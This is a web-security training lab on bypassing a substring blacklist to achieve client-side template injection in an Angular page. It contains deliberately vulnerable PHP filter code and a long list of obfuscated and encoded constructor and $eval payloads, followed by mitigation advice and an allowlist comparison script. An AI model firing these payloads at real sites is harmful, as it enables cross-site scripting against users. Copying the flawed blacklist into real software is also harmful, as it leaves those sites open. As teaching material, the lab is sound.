Lab 2: CSTI with Filter Bypass

CSTI with security filters that can be bypassed

Difficulty: Medium

Lab Overview

This lab demonstrates client-side template injection (CSTI) where basic security filters are in place but can be bypassed. The application rejects a short list of dangerous substrings, which blocks the obvious payloads but not every way of reaching the same code paths.

Objective: Bypass security filters to inject malicious template expressions and achieve XSS.

Vulnerable Code with Filters

// Vulnerable: basic blacklist filter that can be bypassed
function process_csti_with_filters($input) {
    // Substrings that are rejected; anything not on this list passes through
    $dangerous_patterns = ['$eval', 'constructor', 'alert', 'console', 'document', 'window'];

    // Case-insensitive substring check for each pattern
    foreach ($dangerous_patterns as $pattern) {
        if (stripos($input, $pattern) !== false) {
            return "Dangerous pattern detected: " . $pattern;
        }
    }

    // No pattern matched: the raw input is returned unchanged and rendered into the template
    return $input;
}

// Angular template (vulnerable): the filtered input is written into the page source,
// so any {{ }} expression it contains is parsed and evaluated by Angular
<div ng-bind-html="userInput"></div>
<div>{{ userInput }}</div>

Filtered CSTI Tester
Active Filters

The following patterns are filtered:

  • $eval - Angular eval function
  • constructor - Constructor property
  • alert - Alert function
  • console - Console object
  • document - Document object
  • window - Window object

Bypass Techniques

Try these bypass methods:

  • {{ 7*7 }} - Math expression
  • {{ 'a'+'b' }} - String concatenation
  • {{ $eval('alert(1)') }} - Eval bypass
  • {{ constructor.constructor('alert(1)')() }} - Constructor bypass

Vulnerability Details

  • Type: CSTI with Filter Bypass
  • Severity: High
  • Method: POST
  • Issue: Inadequate security filters

Bypass Techniques

  • Obfuscation: Hide malicious patterns
  • Encoding: Use encoded characters
  • Alternative Methods: Use different execution methods
  • Complex Scenarios: Combine multiple techniques

CSTI Filter Bypass Payloads

Use these techniques to bypass security filters:

1. Basic Math Expressions (Not Filtered):
{{ 7*7 }} {{ 1+1 }} {{ 10-5 }} {{ 2*3 }} {{ 8/2 }}
2. String Concatenation (Not Filtered):
{{ 'Hello' + 'World' }} {{ 'a' + 'b' + 'c' }} {{ 'XSS' + 'Test' }} {{ 'CSTI' + 'Vulnerability' }}
3. Variable Access (Not Filtered):
{{ $root }} {{ $parent }} {{ $scope }} {{ this }} {{ self }}
4. Obfuscated Eval Calls:
{{ $eval('ale' + 'rt(1)') }} {{ $eval('con' + 'sole.log(1)') }} {{ $eval('doc' + 'ument.write(1)') }} {{ $eval('win' + 'dow.alert(1)') }}
5. Encoded Eval Calls:
{{ $eval('\x61\x6c\x65\x72\x74(1)') }} {{ $eval('\u0061\u006c\u0065\u0072\u0074(1)') }} {{ $eval(String.fromCharCode(97,108,101,114,116,40,49,41)) }}
6. Obfuscated Constructor Calls:
{{ constructor.constructor('ale' + 'rt(1)')() }} {{ constructor.constructor('con' + 'sole.log(1)')() }} {{ constructor.constructor('doc' + 'ument.write(1)')() }}
7. Encoded Constructor Calls:
{{ constructor.constructor('\x61\x6c\x65\x72\x74(1)')() }} {{ constructor.constructor('\u0061\u006c\u0065\u0072\u0074(1)')() }} {{ constructor.constructor(String.fromCharCode(97,108,101,114,116,40,49,41))() }}
8. Alternative Object Access:
{{ $root.constructor }} {{ $parent.constructor }} {{ $scope.constructor }} {{ this.constructor }}
9. Array Access Methods:
{{ [].constructor }} {{ [].constructor.constructor }} {{ [].constructor.constructor('ale' + 'rt(1)')() }} {{ [].constructor.constructor('con' + 'sole.log(1)')() }}
10. String Access Methods:
{{ 'a'.constructor }} {{ 'a'.constructor.constructor }} {{ 'a'.constructor.constructor('ale' + 'rt(1)')() }} {{ 'a'.constructor.constructor('con' + 'sole.log(1)')() }}
11. Number Access Methods:
{{ 1.constructor }} {{ 1.constructor.constructor }} {{ 1.constructor.constructor('ale' + 'rt(1)')() }} {{ 1.constructor.constructor('con' + 'sole.log(1)')() }}
12. Boolean Access Methods:
{{ true.constructor }} {{ true.constructor.constructor }} {{ true.constructor.constructor('ale' + 'rt(1)')() }} {{ true.constructor.constructor('con' + 'sole.log(1)')() }}
13. Function Access Methods:
{{ (function(){}).constructor }} {{ (function(){}).constructor.constructor }} {{ (function(){}).constructor.constructor('ale' + 'rt(1)')() }} {{ (function(){}).constructor.constructor('con' + 'sole.log(1)')() }}
14. Object Access Methods:
{{ {}.constructor }} {{ {}.constructor.constructor }} {{ {}.constructor.constructor('ale' + 'rt(1)')() }} {{ {}.constructor.constructor('con' + 'sole.log(1)')() }}
15. Date Access Methods:
{{ Date.constructor }} {{ Date.constructor.constructor }} {{ Date.constructor.constructor('ale' + 'rt(1)')() }} {{ Date.constructor.constructor('con' + 'sole.log(1)')() }}
16. Math Access Methods:
{{ Math.constructor }} {{ Math.constructor.constructor }} {{ Math.constructor.constructor('ale' + 'rt(1)')() }} {{ Math.constructor.constructor('con' + 'sole.log(1)')() }}
17. JSON Access Methods:
{{ JSON.constructor }} {{ JSON.constructor.constructor }} {{ JSON.constructor.constructor('ale' + 'rt(1)')() }} {{ JSON.constructor.constructor('con' + 'sole.log(1)')() }}
18. RegExp Access Methods:
{{ RegExp.constructor }} {{ RegExp.constructor.constructor }} {{ RegExp.constructor.constructor('ale' + 'rt(1)')() }} {{ RegExp.constructor.constructor('con' + 'sole.log(1)')() }}
19. Error Access Methods:
{{ Error.constructor }} {{ Error.constructor.constructor }} {{ Error.constructor.constructor('ale' + 'rt(1)')() }} {{ Error.constructor.constructor('con' + 'sole.log(1)')() }}
20. Advanced Bypass Techniques:
{{ $eval('$eval("ale" + "rt(1)")') }} {{ $eval('constructor.constructor("ale" + "rt(1)")()') }} {{ $eval('$root.constructor.constructor("ale" + "rt(1)")()') }} {{ $eval('$parent.constructor.constructor("ale" + "rt(1)")()') }}

Real-World Attack Scenarios

Mitigation Strategies

  • Implement comprehensive input validation and sanitization
  • Use whitelist-based filtering instead of blacklists
  • Implement proper output encoding
  • Use a Content Security Policy (CSP) to prevent code execution
  • Perform regular security testing and vulnerability assessments
  • Monitor for unusual template processing patterns
  • Use Angular's built-in sanitization features
  • Implement proper template sandboxing
  • Use a Web Application Firewall (WAF) to detect bypass attempts
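As an added example (not code from this lab), and serving both the filtered PHP code above and the whitelist/output-encoding items in the mitigation list, here is the lab's blacklist ported to JavaScript beside a character allowlist and an HTML encoder, run over a few constructed inputs. The port of the pattern list is an assumption carried over from the PHP; the point it shows is that the blacklist lets the harmless-looking {{ 7*7 }} probe through (which is exactly what confirms interpolation), while an allowlist that never admits the {{ }} delimiters rejects it outright.

```javascript
// Added example (not the lab's own code): the lab's PHP blacklist ported to
// JavaScript so it can be run beside an allowlist check and an HTML encoder.
// The sample inputs at the bottom are constructed for this example.

const DANGEROUS_PATTERNS = ['$eval', 'constructor', 'alert', 'console', 'document', 'window'];

// Blacklist, equivalent to the lab's stripos() loop: reject on the first
// case-insensitive substring hit, otherwise pass the input through unchanged.
function blacklistFilter(input) {
  const haystack = input.toLowerCase();
  for (const pattern of DANGEROUS_PATTERNS) {
    if (haystack.includes(pattern.toLowerCase())) {
      return { allowed: false, matched: pattern };
    }
  }
  return { allowed: true, matched: null };
}

// Allowlist: accept only the character set the field legitimately needs
// (letters, digits, spaces, basic punctuation, at most 64 chars). Anything
// else, including the '{{' and '}}' interpolation delimiters, is rejected.
const ALLOWED_VALUE = /^[A-Za-z0-9 .,!?'-]{1,64}$/;
function allowlistFilter(input) {
  return ALLOWED_VALUE.test(input);
}

// Output encoding for an HTML context. This stops markup injection but does
// not stop Angular from interpolating '{{ }}' that survives into the template
// source, so it complements the allowlist rather than replacing it.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Run one input through both filters and report the verdicts side by side.
function evaluate(input) {
  return {
    input,
    blacklist: blacklistFilter(input).allowed,
    allowlist: allowlistFilter(input),
  };
}

// Constructed samples: a benign value, the lab's {{ 7*7 }} probe, and one of
// the lab's obfuscated payloads (caught here because '$eval' itself is listed).
const SAMPLES = ['Hello World', '{{ 7*7 }}', "{{ $eval('ale' + 'rt(1)') }}"];
for (const s of SAMPLES) console.log(evaluate(s));
```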